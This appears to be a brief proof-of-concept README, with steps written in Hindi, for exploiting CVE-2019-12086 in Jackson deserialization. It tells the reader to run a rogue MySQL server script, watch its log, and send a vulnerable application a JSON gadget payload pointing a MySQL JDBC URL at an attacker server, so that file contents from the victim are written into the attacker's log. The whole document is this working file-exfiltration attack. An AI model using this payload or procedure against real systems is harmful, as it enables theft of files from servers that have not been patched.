
jackson unserialize
CVE-2019-12086 jackson unserialize
1、दुर्भावनापूर्ण MySQL सर्वर प्रारंभ करें:
python rogue_mysql_server.py
2、उसी निर्देशिका में mysql.log देखें:
tail -f mysql.log
3、भेद्यता वाले अनुप्रयोग को निम्नलिखित json भेजें:
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
जब jackson दुर्भावनापूर्ण json स्ट्रिंग को डीसेरियलाइज़ करता है, तो वह दुर्भावनापूर्ण MySQL सर्वर से कनेक्ट होता है, और पढ़ी गई फ़ाइल की सामग्री दुर्भावनापूर्ण सर्वर के mysql.log में लिखी जाती है।